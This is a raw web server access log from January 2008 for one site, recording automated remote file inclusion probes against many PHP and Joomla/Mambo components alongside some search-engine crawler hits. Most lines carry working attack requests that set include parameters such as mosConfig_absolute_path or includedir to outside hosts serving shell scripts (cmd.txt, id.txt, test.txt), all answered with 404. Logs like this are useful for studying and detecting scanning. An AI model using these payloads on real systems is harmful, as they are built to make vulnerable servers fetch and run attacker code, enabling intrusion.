198.106.189.58 - - [06/Jan/2008:06:23:07 -0800] "GET /logs/access_071129.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.189.58 - - [06/Jan/2008:06:23:07 -0800] "GET /logs/access_071129.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [06/Jan/2008:06:24:08 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [06/Jan/2008:06:24:27 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:06:24:29 -0800] "GET /logs/access_071216.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:06:24:30 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:06:24:30 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:25:21 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:25:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:06:25:40 -0800] "GET /logs/file.php?root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:06:25:40 -0800] "GET /file.php?root=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:25:41 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:25:45 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.16.224.119 - - [06/Jan/2008:06:26:14 -0800] "GET /logs/access_071224.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:28:35 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:28:35 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [06/Jan/2008:06:28:52 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://txfishes.com/wikispecies/img/wiki/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:06:28:54 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.236.230.52 - - [06/Jan/2008:06:29:01 -0800] "GET /logs/access_071229.log//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.236.230.52 - - [06/Jan/2008:06:29:03 -0800] "GET //components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.236.230.52 - - [06/Jan/2008:06:29:06 -0800] "GET /logs//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:06:31:08 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.72.180.111 - - [06/Jan/2008:06:32:23 -0800] "GET /logs/access_071205.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.180.111 - - [06/Jan/2008:06:32:25 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.180.111 - - [06/Jan/2008:06:32:26 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:36:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.7.115 - - [06/Jan/2008:06:37:44 -0800] "GET /logs/access_070914.log HTTP/1.0" 200 86919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:06:39:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:06:39:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.93.173.100 - - [06/Jan/2008:06:39:56 -0800] "GET /cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.173.100 - - [06/Jan/2008:06:39:56 -0800] "GET /logs/cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:41:24 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:41:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:41:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.231 - - [06/Jan/2008:06:43:15 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:43:38 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:43:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.47.199.89 - - [06/Jan/2008:06:43:44 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [06/Jan/2008:06:43:44 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.199.89 - - [06/Jan/2008:06:43:44 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:44:07 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:06:44:24 -0800] "GET /index.php?root_dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.47.199.89 - - [06/Jan/2008:06:47:01 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.209.213 - - [06/Jan/2008:06:48:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.213 - - [06/Jan/2008:06:48:19 -0800] "GET / HTTP/1.0" 200 2946 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.44.234.6 - - [06/Jan/2008:06:49:04 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
207.44.234.6 - - [06/Jan/2008:06:49:04 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:06:50:47 -0800] "GET /logs/access_071219.log/index.php?root_dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:06:50:47 -0800] "GET /index.php?root_dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:06:50:48 -0800] "GET /logs/index.php?root_dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.248.67 - - [06/Jan/2008:06:52:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.97.248.67 - - [06/Jan/2008:06:52:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:52:42 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:52:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.19.139 - - [06/Jan/2008:06:53:10 -0800] "GET /logs/access_071214.log//tools/send_reminders.php?noSet=0&includedir=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.198 - - [06/Jan/2008:06:54:11 -0800] "GET /minamijewelry/html/terms.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.187.94 - - [06/Jan/2008:06:54:35 -0800] "GET /logs/access_071224.log/index.php?root_dir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:06:56:36 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.151.232.133 - - [06/Jan/2008:06:57:57 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
203.151.232.133 - - [06/Jan/2008:06:57:57 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:15 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:15 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:15 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:17 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:18 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:18 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:20 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:20 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:21 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:21 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:21 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:23 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:43 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:43 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:43 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:45 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:45 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:45 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:52 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.39.193.102 - - [06/Jan/2008:06:58:53 -0800] "GET /logs/access_071224.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.39.193.102 - - [06/Jan/2008:06:58:53 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:53 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:06:58:53 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.39.193.102 - - [06/Jan/2008:06:58:53 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://66.153.86.221/www?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:59:49 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:59:49 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:06:59:49 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:07:00:01 -0800] "GET /logs/access_071224.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:07:00:01 -0800] "GET /logs/access_071224.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.155.108 - - [06/Jan/2008:07:00:02 -0800] "GET /logs/access_071224.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:07:01:03 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [06/Jan/2008:07:05:13 -0800] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.86.232.194 - - [06/Jan/2008:07:05:14 -0800] "GET //content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.209.205 - - [06/Jan/2008:07:05:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [06/Jan/2008:07:05:20 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:07:06:30 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:07:06:30 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:07:06:30 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:07:06:44 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:07:06:44 -0800] "GET //modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:07:06:44 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:07:08:26 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.21 - - [06/Jan/2008:07:09:57 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.11.122.72 - - [06/Jan/2008:07:10:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.11.122.72 - - [06/Jan/2008:07:10:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.79.190.53 - - [06/Jan/2008:07:10:58 -0800] "GET /logs/cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
217.79.190.53 - - [06/Jan/2008:07:11:01 -0800] "GET /cutenews/show_archives.php?cutepath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:07:11:45 -0800] "GET /logs/index.php?mnu=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:07:11:45 -0800] "GET /index.php?mnu=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:07:11:49 -0800] "GET /classified_right.php?language_dir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:07:11:50 -0800] "GET /logs/classified_right.php?language_dir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
